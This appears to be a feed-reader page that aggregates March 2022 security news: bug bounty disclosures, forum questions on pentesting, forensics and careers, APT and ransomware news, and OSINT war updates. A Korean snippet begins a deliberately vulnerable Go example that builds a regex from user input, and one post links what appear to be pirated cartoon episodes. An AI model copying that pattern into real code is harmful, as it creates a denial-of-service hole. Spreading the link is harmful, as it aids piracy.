    Try hack me: Sakura Room
    OSINT meydan okuması Continue reading on Medium »
    Ukraine — Point de situation au 31 mars
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / March 29
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
  • Open

    ihsinme: CPP Add a query to find incorrectly used exceptions.
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1455531 - Bounty: $1000
    [Python]: Add shutil module sinks for path injection query
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1471622 - Bounty: $1000
    Java: An experimental query for ignored hostname verification
    GitHub Security Lab disclosed a bug submitted by artem: https://hackerone.com/reports/1481247 - Bounty: $1800
    [Java]: CWE-073 - File path injection with the JFinal framework
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1483918 - Bounty: $1800
    CPP: Add query for CWE-266 Incorrect Privilege Assignment
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1483919 - Bounty: $1800
    [C#] CWE-759: Query to detect password hash without a salt
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1484086 - Bounty: $1800
    Java : Add query to detect Server Side Template Injection (SSTI)
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1490372 - Bounty: $1800
    Python: CWE-338 insecureRandomness
    GitHub Security Lab disclosed a bug submitted by museljh: https://hackerone.com/reports/1490400 - Bounty: $1800
    [Java]: Timing attacks while comparing the headers value
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1496268 - Bounty: $1000
    [Java]: Add JDBC connection SSRF sinks
    GitHub Security Lab disclosed a bug submitted by p0wn4j: https://hackerone.com/reports/1512936 - Bounty: $1800
    [Python]: CWE-611: XXE
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1512937 - Bounty: $1800
    CPP: Add query for CWE-377 Insecure Temporary File
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1515139 - Bounty: $1000
    [Java]: CWE-200 - Query to detect insecure WebResourceResponse implementation
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1526609 - Bounty: $1800
    Upload Profile Photo in any folder you want with any extension you want
    Stripo Inc disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/753375
    Insecure Storage and Overly Permissive API Keys
    Stripo Inc disclosed a bug submitted by andformod: https://hackerone.com/reports/1283575
    Ability to use premium templates as free user via https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral
    Stripo Inc disclosed a bug submitted by 0xkira: https://hackerone.com/reports/1166993
  • Open

    Tool for Chromebook forensic acquisition
    Do anyone know of a tool that I can use for Chromebook forensic acquisition (K-12 environment). The company Magnet Forensics had such a tool, but they no longer support it. submitted by /u/1682aggie [link] [comments]
    cyber triage vs magnet axiom cyber
    I get Axiom's analysis might be a little better/different. But in terms of remote triage what's the difference? Is one cheaper? submitted by /u/CrazyKitty2016 [link] [comments]
    The Truth About USB Device Serial Numbers
    submitted by /u/shelbpresc [link] [comments]
  • Open

    What are some RPOs for popular compliance standards?
    Also, how does your company determine its Recovery Point Objectives? submitted by /u/CitizenJosh [link] [comments]
    How to validate Dom xss via via scripts
    Hey everyone. I've been around for a while but have avoided certain topics like the plague. Dom xss is one of those but today I watched a video on it that recommended reviewing the pages code and going through that method to discover Dom xss. Now to be clear what brought this on was a finding in burp, it's flagging on a JS file and from there location.hash data being passed to an element/value. What I could use some help with is understanding this type of Dom xss and how to validate this. I'm tired of not understanding this. My thought is that this js file has a vulnerable function and I should be looking for this function in use in the application somewhere. Oh also I'm not the most intelligent person and have no real experience with Javascript so it may be necessary to dumb some things down. And if there's a video that talks about this I would appreciate it. All the ones I've seen just show document.write directly in the web page not in a script. submitted by /u/realKevinNash [link] [comments]
    How to document access request workflows?
    A common problem is that people new in an organization don't know how to get access to certain systems. Are there known best practices how to help people orient themselves what access they need to request to achieve a certain task? E.g. I want to access system ABC, therefore I need role "ABC user" and should raise this request with "ABC admins" who can be found here: "[xyz@example.com](mailto:xyz@example.com)" submitted by /u/soroyaya [link] [comments]
    Mandatory Access Control Frameworks
    Hi, I want to improve on my rather rudimentary knowledge of MAC Frameworks (SELinux, AppArmour). Can you point me to learning material/courses that you have had good experience with? submitted by /u/turingtest1 [link] [comments]
    I am using burp suite to intercept traffic from a site, I am trying to view the images from the proxy but the site uses web sockets to send all the images Data URIs (Base64) at once to be loaded on Demand Which is called "Lazy-Loading" , Alternatively How do i get Driftnet to work on Data URIs ?
    Can Lazy Loading be considered some sort of protection against tools that sniff images over network like Driftnet ? Image of the burp and the data Thanks a lot submitted by /u/theycallmemonlight [link] [comments]
  • Open

    Possible New Java Spring Framework Vulnerability (Updated: Not a Spring Problem)
    Article URL: https://isc.sans.edu/diary/Possible+new+Java+Spring+Framework+Vulnerability+%28Updated%3A+not+a+Spring+problem%29/28498 Comments URL: https://news.ycombinator.com/item?id=30858065 Points: 2 # Comments: 0
  • Open

    Going Through FBI's "Oversight of the FBI Cyber Division" Testimony
    The FBI has recently released its "Oversight of the FBI Cyber Division" in the form of a testimony which offers quite an important peek inside the FBI's understanding of current and emerging cyber threats including an understanding of its situational awareness in the world of cybercrime and cyber related fraud and threats.An excerpt:"The most significant nation-state threats we face are those
    The FCC Adds Kaspersky to Its List of National Security Threats
    The FCC has recently added Kaspersky products to it's list of National Security Threats while the company publicly issued a statement claiming that the decision was made on political grounds. The company also cited yet another decision by the U.S DHS back in 2017 which basically forbids U.S based companies from doing business with the company. In the past I've discussed how central antivirus
    Courtesy of Republic of Bulgaria! - Part Five
    In the deepest and ugliest and most disgusting corners of the universal irrelevance of the universe known as dipshit land savage land peasant land there's a universal dipshit known as? Guess what? I won't tell you and best of all you don't have to guess for yourself. Don't bother. Related posts:Courtesy of Republic of Bulgaria! - Part FourCourtesy of Republic of Bulgaria! - Part ThreeCourtesy of
  • Open

    SecWiki News 2022-03-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Shellcode as User Input | Off Topic if I may
    submitted by /u/C0DEV3IL [link] [comments]
    Whitepaper – Double Fetch Vulnerabilities in C and C++
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
    My Pentest Log -12- (Out-Of-Band Sql Injection in MySQL)
    Greetings to everyone from Byzantion, Continue reading on Medium »
    Universe Finance x Immunefi: Bug Bounty Program
    Dear spacemen, Continue reading on Medium »
    How I was able collect PII of all users
    Hello Folks 👋, Continue reading on Medium »
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Notion as a platform for offensive operations
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Simplifying Your Operational Threat Hunt Planning
    Opening Hopefully you all were able to read our recent Threat Hunting whitepaper and had the chance to listen to our latest Threat Hunting webinar. These references should be used as the foundation of information, which leads us into the next journey: how to build out your first Threat Hunt. Building out an organization’s Threat... The post Simplifying Your Operational Threat Hunt Planning appeared first on TrustedSec.
  • Open

    一张图看懂全球最新DDoS攻击趋势
    一张图看懂全球最新DDoS攻击趋势。
    一张图看懂全球最新DDoS攻击趋势
    一张图看懂全球最新DDoS攻击趋势。
    “透明部落”APT组织正在大肆攻击印度官员
    具有巴基斯坦国家背景的,名为透明部落的APT组织,正在利用CrimsonRAT远程访问木马大肆发起网络攻击活动,目标直指印度官员。
    FreeBuf早报 | 透明部落组织对印度官员发起攻击;华盛顿卫生区再遭数据泄露
    华盛顿州的一个卫生区发布了 2022 年的第二次数据泄露公告。
    Shutterfly 因遭Conti 勒索软件攻击后被泄露数据
    近期,在线零售和摄影制造平台Shutterfly在遭遇Conti勒索软件攻击后被泄露了员工信息。这是一家为客户、企业,甚至包括为Shutterfly.com、BorrowLenses、GrooveBook、Snapfish 和 Lifetouch在内的品牌提供摄影服务的公司。Shutterfly最近披露由于勒索软件攻击,其网络于2021年12月3日遭到入侵。在勒索软件攻击期间,威胁参与者会获得对公
    部分 WordPress 网站被注入脚本,对乌克兰发起 DDoS 攻击
    被攻击的网站主要包括乌克兰政府机构、乌克兰国际军团的招募网站、金融网站和其他亲乌克兰网站。
    史上最大的加密黑客攻击诞生:Axi Infinity侧链 Ronin bridge被盗6.25亿美元
    近日,攻击者从Axi Infinity的侧链 Ronin 跨链桥窃取了价值近6.25亿美元的以太坊和USDC。
    以轻松赚钱为由,黑客每天发送近 4000 封虚假求职邀约邮件
    Proofpoint发布报告,指出一黑客团伙利用电子邮件散布虚假的求职邀约,不仅窃取用户个人数据信息,还诱导受害者进行洗钱活动。
    漏洞情报 | Spring 框架远程命令执行漏洞预警
    3月29日,Spring框架曝出RCE 0day漏洞。使用JDK9及以上版本皆有可能受到影响。
  • Open

    【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑
    作者:深信服千里目实验室 序言 APT,全称Advanced Persistent Threat,又名高级持续性威胁,往往有地区或政治背景,以情报搜集、破坏、或经济利益为目的,攻击环节可能使用各类社工、打点和内网渗透以及0day漏洞利用,作为一种非对称的攻击手段,往往能为攻击组织背后的政治或经济实体带来意想不到的地缘、情报、经济甚至军事利益或战术优势。 APT攻击的检测、溯源与反制,往往代表...
  • Open

    【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑
    作者:深信服千里目实验室 序言 APT,全称Advanced Persistent Threat,又名高级持续性威胁,往往有地区或政治背景,以情报搜集、破坏、或经济利益为目的,攻击环节可能使用各类社工、打点和内网渗透以及0day漏洞利用,作为一种非对称的攻击手段,往往能为攻击组织背后的政治或经济实体带来意想不到的地缘、情报、经济甚至军事利益或战术优势。 APT攻击的检测、溯源与反制,往往代表...

  • Open

    Windows freaking XP
    I may need to expose a windows XP machine to the internet, although I am fighting it, a battle maybe lost. Our corp AV doesnt support XP nor will it get patched. Any suggestions on protecting it. Would a proxy server give me enough protection, specifically a NGFW acting in proxy mode with the XP machine ring fenced to hell. Doesnt directly expose the machine to the web but not sure it will give the protection I am hoping for. NGFW will also do IPS, Deep inspection etc... Edit: thanks for the follow up all, an interesting read in the replies and some good feedback on options. I talked the management out of giving it internet access. This is an OT network with little option of changing OS as the tools/apps support only XP. OT networking is woeful at times and very real for those saying stop using XP. For those interested isolated pvlan behind my FW with only one "DMZ" jumpbox given inbound access to allow remote app support with MFA and identity based rules for access to Jumpbox, copy/paste and file transfer disabled as much as i can between the two, and only a strict select and trusted few have access to JB. Data transfers are controlled via a manual process with scrubbed USB stick using a buffer device to scan before transferring data. submitted by /u/watty_123 [link] [comments]
    Questions about using public wifi
    Let's say I am at an apartment, on the plane, etc. where I am using public wifi with VPN: Is it safe to use whatsapp, facebook etc? Im just thinking, when I use whatsapp or facebook app, I dont really enter any info/PIN/password at all, so it should be safe, right? Banking apps that require you to enter pin number. Is it safe to do this while on public wifi? Will the VPN help against this? Even if I visit websites, if those websites use HTTPS, shouldn't I be safe? submitted by /u/AliveandDrive [link] [comments]
    eJPT Cert exam
    I have been thinking of taking the eJPT cert but I want to properly learn, so does anyone know of some resources to prepare for the test or tips as well? submitted by /u/Mokushi99 [link] [comments]
    How to study SANS labs?
    Currently indexing and working through the SEC504 / GCIH labs. Aside for working through the each lab multiple times, anyone have methods to drill the labs into your brain? Not sure if indexing the 450p workbook is with the time. Thanks in advance! submitted by /u/Vassar_Bashing [link] [comments]
    How can I make a switch from DevOps to security oriented roles?
    Hi, I started out as a developer, then I got into Cloud and automation, and I loved it very much. Cloud infrastructure automation felt like playing with Lego bricks - fitting all the right cloud services together and making someone else's job easier. I have 5 years of total experience in IT. But recently I moved into a DevOps role (if I could even call that) - and I was told that I will be working on Terraform scripts, migrating apps from on-premises, but few months into the job, I found that it is anything but that. I feel like I don't really have a core skill anymore, no identity, and feel like an imposter. My dream since the beginning was to get into security and I thought getting my hands dirty in DevOps and infrastructure related roles would help me get there, but now I do miscella…
    Higher Studies for Cyber Security
    Hi guys. A Quick thing. I am changing my career path to CyberSecurity because I always wanted to be in that but never got the chance to do so because of Financial Issues. But now I got all the stuff that I need to pursue my dream. I am 27 years old and I know I am not that late to start from scratch. So for my studies, I thought of starting from Network Engineering Diploma, HND in Network Engineering, and then BSc in Ethical Hacking and Network Security. Do you guys think this is the right path to go for or is there another path I should follow? My main target is to be in the Defense (Blue Team) side of CS. But I want to learn Pentesting as well which I though to myself doing it alone and getting help from professionals in the field. But my worry is about my studies. Please help . :) submitted by /u/PapadumSriLanka [link] [comments]
    Encrypted android->jabber (laptop) messaging?
    Basically I have a friend who isn't technically proficient, and I want him to communicate securely with me. He's too retarded to learn how to use encryption etc. After a quick steup with him, physically next to me, on his phone, what can I install on tails to communicate? Is there a standalone android app that will connect to TAILS with him? Also what stops google's keyboard from storing keystrokes? submitted by /u/sohna2 [link] [comments]
    ACSC (Aus) 'Essential Eight' benchmark scanner: Do these exist for on-device scanning (like OpenSCAP can for Stig)?
    I'd love to use a tool that can mark against Essential Eight controls at different maturity levels. Everyone seems to just self-assess manually, but many can be queried with powershell modules, wmi etc. Google results are very limited for Aus-relevant security scanners. submitted by /u/L3T [link] [comments]
    Just got a life changing salary by switching job
    I cannot hold my happiness anymore and I have nobody in my entourage that I can talk about money and career but I just got a new high paying job! If you check my post history, I was a bit concerned about my salary of 60k in Montreal. Now I accepted an offer of 93k (TC of 105k) for a Security Analyst role in the financial industry and to be honest, it's a life changing salary for me. I never imagined having this kind of salary after 2 years out of college. Still living at my parents place and never got a high salary like this. I know is not r/personalfinance but what is the best advice you can give to a young professional like me ? Thanks! submitted by /u/gateau_a_la_creme [link] [comments]
    First day of internship tomorrow
    Hello, So recently i graduated from MIS and i was taking some time off . Doing ctfs on htb,learning basic networks (protocols,routing,vpns ,etc..) till we recently discovered a neighbour who works in IT . I talked with him about an internship for me and he agreed after seeing my CV. His company works in Cloud and IT solutions. I told him that i am more interested in the security part and he told me he can give me access to courses about Fortigate,Palo alto,and he will let me interact with customers more. There jobs has to do with networks a lot and i felt there is room for learning network security . At least i can change my starus on Linkedin to Network security intern . But they also heavily work in cloud and Azure. I am really nervous. I feel like I am going to fuck shit up tomorrow and end up being a clown. I don’t want also to feel subconscious because I didn’t get it 100% from my skills but there is a connection. I am scared this internship will has nothing to do with security but I need internship to fill my resume. I guess tomorrow we will find out . I feel like that i am going to end up smoking before meeting them and blow the whole thing up and go back to testing Websites using Burp for SSRF and XSS. (Without any luck) submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Swappi Testnet publica y recompensas por errores
    Prueba Swappi y gana recompensas. ¡Hasta 100.000 $PPI de recompensa! Continue reading on Conflux en español »
    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on CodeX »
    nothing
    Continue reading on Medium »
    How I bypassed 403 forbidden domain using a simple trick
    Hello hunters, Continue reading on Medium »
    How I Accidentally Prevented A Mass Hacking
    Not all heroes wear a cape or get pay for their work Continue reading on Geek Culture »
  • Open

    Top 5 Topics to Discuss with Clients About Website Security
    If you’re a website developer or server administrator it’s always a good idea to inform your clients about the basics in terms of their website’s security, and the inherent need for cautious security practices. Attacks and the methods of gaining access to a web server are always evolving, so it’s always in a client’s best interest to remain aware of the potential risks that come along with owning their website. Of course, these should be considered by all website owners and not limited to just the site administrators or developers, however. Continue reading Top 5 Topics to Discuss with Clients About Website Security at Sucuri Blog.
  • Open

    Go Fuzzing
    Article URL: https://go.dev/doc/fuzz/ Comments URL: https://news.ycombinator.com/item?id=30848235 Points: 1 # Comments: 0
  • Open

    Ukraine — Point de situation au 30 mars
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / March 28
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 27
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    War in Ukraine / March 26
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Factchecking. Bombing of the children’s hospital and maternity hospital in Mariupol
    Our investigation revealed lots of factual errors in the claims of the Russian propaganda media. Continue reading on Medium »
    Open-Source Intelligence — the Low Down
    The whos, hows and whens of emergent information gathering systems in geopolitics and warfare. It’s not all secret these days is it when… Continue reading on The Dock on the Bay »
    My first Trace labs CTF
    Today was the day, I woke up at 0730 had my coffee and checked my email, what did I find, another confirmation email from Human Decoded… Continue reading on Medium »
  • Open

    Identify the mobile number of a twitter user
    Twitter disclosed a bug submitted by aymen_mansour: https://hackerone.com/reports/1225164 - Bounty: $560
    2 click Remote Code execution in Evernote Android
    Evernote disclosed a bug submitted by hulkvision_: https://hackerone.com/reports/1377748 - Bounty: $750
  • Open

    pync - Netcat for Python
    submitted by /u/brenw0rth [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Linux kernel CVE-2022-1015,CVE-2022-1016 in nf_tables cause privilege escalation
    submitted by /u/Gallus [link] [comments]
    Busyloop in curl
    submitted by /u/RegularHumanoid [link] [comments]
    Ruby Deserialization - New Gadget Chain for Ruby on Rails
    submitted by /u/Gallus [link] [comments]
  • Open

    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    ABC-Code Execution for Veeam - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    Analyzing Docker Image for Retrieving Secrets
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Data Exfiltration using RedDrop
    Introducing RedDrop — a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives. Continue reading on Maveris Labs »
    How to Write an Effective Pentest Report: 5 Key Sections
    As a pentester, you play a critical role in helping to secure an organization’s infrastructure, assets, and data from bad actors. While… Continue reading on Medium »
    How Clubhouse user scraping and social graphs
    TL;DR During this RedTeam testing, we used Clubhouse as a social engineering tool to find out more about our client’s employees. Continue reading on Medium »
    Reading Windows Sticky Notes
    Sticky Notes has been part of Windows since at least Windows 7. For those who aren’t familiar with it, Sticky Notes allows the user to add… Continue reading on Medium »
  • Open

    [Cullinan #30] Add ReDOS and Regex Injection
    컬리넌 로그 #30입니다. ReDOS와 Regex Injection을 추가했습니다. 그리고 XSS 내 CSP 우회에 대한 부분을 Bypass protection 하위 항목에서 별도로 Bypass CSP로 분리했습니다. 겸사겸사 누락됬던 우회 패턴도 추가했구요. 그리고 Defensive techniques에도 CSP 항목을 따로 만들어두었습니다. Add ReDOS Add Regex Injection Change XSS (Bypass CSP) Change XSS (Add CSP in Defensive techniques)
    Regex Injection
    🔍 Introduction Regex Injection은 공격자가 Regex가 compile 되기 전 regex 패턴에 영향을 줄 수 있는 Injection 공격을 의미합니다. Injection 공격으로 큰 영향력이 발생하는건 아니지만, 이를 통해 ReDOS를 쉽게 발생시킬 수 있습니다. 🗡 Offensive techniques Detect With Sourcecode 소스코드가 있다면 사용자 입력값이 정규표현식 문법에 영향을 주는지 체크하면 됩니다. 대표적으로 정규표현식 문법을 외부 파라미터로 생성하는 경우 이에 해당됩니다. Code 1 2 3 4 data := c.Param("user_data") body := c.Param("user_body") r, _ := regexp.
    ReDOS (Regex DOS)
    🔍 Introduction ReDOS는 정규표현식을 사용자로부터 입력받을 때 발생할 수 있는 보안 문제입니다. 일반적으로 ReDOS, Regex DOS 등으로 불리며 자체적으로 반복되는 그룹화 정규식과 정규식 검증 로직을 만족하는 대량의 문자 등을 이용해서 한번의 웹 요청으로 서비스의 가용성을 떨어뜨리는 방법입니다. 이러한 ReDOS는 Regexp 엔진이 Backtracking 기능을 사용할 때 발생하며 이 기능은 정규표현식 처리 시 가능한 모든 경로를 탐색하기 위해 비 효율적인 작업을 여러번 시도하게 됩니다. 이로인해 시스템의 자원을 고갈시키며 DOS를 수행할 수 있습니다.
  • Open

    Autopsy Cannot View Extracted Content In Results
    Hi. Im new to Autopsy, Im using the Windows version but I have also tried using it as a part of CAINE toolkit on a Linux VM, and I have the same problem. I am unable to view Extracted Content drop-down which should show interesting observations by the tool for this specific USB image file. It should also shows Web Artifacts which is absolutely crucial for this analysis. Do I need to download specific modules to view those results? Where do I get them from? I'd really appreciate any help in this regard. ​ Thanks. https://preview.redd.it/zujbu7eticq81.png?width=620&format=png&auto=webp&s=2a6e9fd19dd7fb96bb78e373ac792d08fb52966e submitted by /u/ResourceGlum6199 [link] [comments]
    Digital Forensics Basics: A Practical Guide for Kubernetes DFIR
    submitted by /u/MiguelHzBz [link] [comments]
    Is possible to transition from LE forensics to a business role?
    Hello, Whilst aiming for an entry level business analyst job, I fell into a law enforcement digital forensic role and have remained there for 3 years as a digital forensic analyst. This is my first serious job so I don’t really have experience else where. I do have IT industry certs (none of the majors ones) but no degree. Whilst in this role, I have made a couple extremely minor operational changes (by minor, I mean barely making it to the CV/resume) which has reminded me of my drive for a business analyst type role. My salary is decent for this type of role and is more than what an entry level business analyst role would be. I would be willing to take a small pay cut but from what I’ve seen it would be around a 10k pay cut which I just cannot absorb. Besides the problem mentioned above, if at all possible, how would I transition from this role to a business role e.g. business analyst/design? Has anyone done the same? I considered writing in r/careerguidance but I cannot imagine many people in that subreddit knowing much about LE forensics. submitted by /u/gofigured21 [link] [comments]
    Telephone data collection
    Can someone let me know how I can extract data from landline phones. The data required is phone Records, Phone recording etc submitted by /u/Pepperknowsitall [link] [comments]
    How hard is it to examine iPhones?
    Is it frustrating to have to examine iPhones or any specific model phones? I understand most smartphones use encryption and some claim that most of your data is gone after a reset, but is that really true? I don’t believe any encryption is strong it can probably bypassed. submitted by /u/Ill-Date-1852 [link] [comments]
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: 一款自动化工具 by ourren 如何通过开源组件实现一套山寨版的 BAB 方案 by ourren 从主流安全开发框架看软件供应链安全保障的落地 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: 一款自动化工具 by ourren 如何通过开源组件实现一套山寨版的 BAB 方案 by ourren 从主流安全开发框架看软件供应链安全保障的落地 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 最快勒索软件4分钟加密53G数据;部分APP存读取剪贴板用户信息
    一种名叫LockBit的勒索软件效率惊人,在四分钟内就加密了一台Windows服务器上的近10万个、约53GB的数据文件。
    Kimsuky 针对加密货币公司与零售行业发起攻击
    Kimsuky 使用加密货币相关信息作为诱饵文件,应该是针对加密货币公司发起的攻击。
    因遭网络攻击,乌克兰电信网络服务暂时中断
    乌克兰电信能够正常运营的服务已跌至俄乌战争前的 13%。
    CISA敦促机构组织对Chrome、Redis漏洞进行修补
    近日,美国网络安全与基础设施安全局(CISA)下令联邦民事机构在未来三周内对谷歌Chrome零日漏洞和Redis的一个重要漏洞进行修补。
    GhostWriter APT组织使用Cobalt Strike Beacon攻击乌克兰的国家实体
    近期,乌克兰CERT-UA发现与白俄罗斯有关的GhostWriter APT组织进行的鱼叉式网络钓鱼活动,该组织通过Cobalt Strike Beacon恶意软件来攻击乌克兰国家实体。这次的网络钓鱼邮件使用名为“Saboteurs.rar”的RAR存档,其中包含RAR存档“Saboteurs 21.03.rar”。第二个存档包含SFX存档“Saboteurs filercs.rar”,专家声称这
    因设备短缺,俄罗斯面临互联网通信危机
    由于缺乏可用电信设备,俄罗斯境内互联网服务即将大规模中断。
    拜登政府发布5.8万亿预算,网络安全预算再次增加
    和2022财年相比,拜登政府再次增加了数十亿的网络安全方面的预算。
    研究发现,早期“三重勒索”软件SunCrypt至今仍然活跃
    作为一种RaaS(勒索软件即服务),SunCrypt在2020年活动猖獗,虽然之后有所沉寂,但根据最新发现,该勒索软件仍不时处于活跃状态。
    Gartner发布《中国云安全市场概览》:细看云安全发展如何进入黄金时代
    Gartner预计,到2024年,中国终端用户在系统基础设施和基础设施软件上的支出将有近40%转移到云服务支出。
  • Open

    1-13 of Spongebob Squarepants, 3 movies and Kamp Koral and Patrick Star show
    https://drive.google.com/drive/folders/12kw4rOnqnyj0vNF8SOfQZZpI9HLfzqkl submitted by /u/LateDream [link] [comments]
  • Open

    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Five
    I've decided to continue the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four" blog post series and I've decided to issue yet another update in terms of currently active ransomware themed personal email address accounts.Sample list of currently active ransomware themed email address accounts includes:restorealldata@
  • Open

    黑客利用钓鱼邮件来分发 IcedID 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ 这篇文章描述了 Intezer 研究小组发现的一个新的攻击活动的技术分析,黑客通过一个钓鱼邮件发起攻击,利用会话劫持来传输 IcedID。 地下经济不断演变,攻击者专攻特...
  • Open

    黑客利用钓鱼邮件来分发 IcedID 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ 这篇文章描述了 Intezer 研究小组发现的一个新的攻击活动的技术分析,黑客通过一个钓鱼邮件发起攻击,利用会话劫持来传输 IcedID。 地下经济不断演变,攻击者专攻特...

  • Open

    Computer Science or Cyber Security degree?
    Hey everyone, I'm in high school right now, and am 100% sure I want to work with computers, and like 80% sure I want to work in cybersec. Should I go for a cyber security degree or computer science? submitted by /u/OpBanana1 [link] [comments]
    Web app pentesting technical tutorials/checklists
    Hi! I was wondering if anyone knew any resources (website guides, books) for pentesting web apps, with specific examples of how they're done with modern (or somewhat modern) tools? I see a lot of checklists about what to test but not really how to test them or they mention how to test them at a high level. There's youtube videos and stuff but I was hoping there was a centralized resource that was more in text, but if there's a good playlist of youtube videos then that's cool too! Thanks! submitted by /u/Epsi0 [link] [comments]
    Server Internet access - block by default?
    What is the opinion these days of blocking internet access from servers that don't need it? We use local patch management and almos all of our services are internal. We've been breached (before I started) multiple times, and are using geoblocking for both inbound and outbound traffic. Just wondering if it really makes a difference. submitted by /u/brettfk [link] [comments]
    Is my pentest report ok?
    Hello, my name is Fred. I’m ethical pentester and hacker. Top 1000 THM & HTB. I just did a NMAP and a Nessus. I don’t have time to write a report - can i just give the customer my Nessus scan pentest report? submitted by /u/mrdeadbeat [link] [comments]
    Tracking vulnerabilities for non-technical staff
    What is the best way to track the remediation of vulnerabilities (not just discover them)? ​ We use tools like Nessus to discover vulnerabilities, but I'm looking to allow tracking of the process of remediation across multiple non-security teams (such as assigning tasks to sysadmins and allowing project managers to track). I'd like something more auditable than an Excel file sitting on SharePoint... We do have an internal ticketing system, but I feel like there's a better solution out there. submitted by /u/Securivangelist [link] [comments]
  • Open

    Redacted Cartel Custom Approval Logic Bugfix Review
    Summary Continue reading on Immunefi »
    Broadening our Bug Bounty Program: Trust, Security, and Transparency
    We’re expanding our public bug bounty program for Palantir’s software and infrastructure. Continue reading on Palantir Blog »
    Zenlink уклав партнерство з Immunefi і запустив програму пошуку помилок
    Сьогодні 23 березня 2022 року, і ми раді повідомити, що компанія Zenlink уклала партнерство з Immunefi і запустила програму пошуку помилок. Continue reading on Medium »
    Zenlink заключил партнерство с Immunefi и запустил программу по поиску ошибок
    Сегодня 23 марта 2022 года , и мы рады сообщить, что компания Zenlink заключила партнерство с Immunefi и запустила программу по поиску… Continue reading on Medium »
    Use of Default Credentials to Unauthorised Remote Access of Internal Panel of Network Video…
    👨🏼‍💻Discovered by Dnyanesh A. Gawande Continue reading on Medium »
    One-liner Bug Bounty Tips
    A collection of awesome one-liner scripts especially for bug bounty. Continue reading on Medium »
    Google Dork for instant bounties
    Google dorks that’ll get you instant bounties, proven and tested multiple times. Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 29 mars
    Les dernières 24h Continue reading on Medium »
    TryHackMe: OhSINT Room Write-Up (No Answers)
    OhSINT Room Description: “Are you able to use open source intelligence to solve this challenge?” Continue reading on Medium »
    Analyse super le espionage per fonte aperte
    Fonte aperte (in anglo: open source) es un terminologia technic que denota un producto que include un licentia pro usar su codice fonte… Continue reading on Bureau International »
  • Open

    [Patch now!] Multiple Flaws In Azure Allow Remote Code Execution for All
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    Denial of Service vulnerability in curl when parsing MQTT server response
    curl disclosed a bug submitted by jenny: https://hackerone.com/reports/1521610
    EC2 Takeover at turn.shopify.com
    Shopify disclosed a bug submitted by 0xd0m7: https://hackerone.com/reports/1295497 - Bounty: $500
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability [pdf]
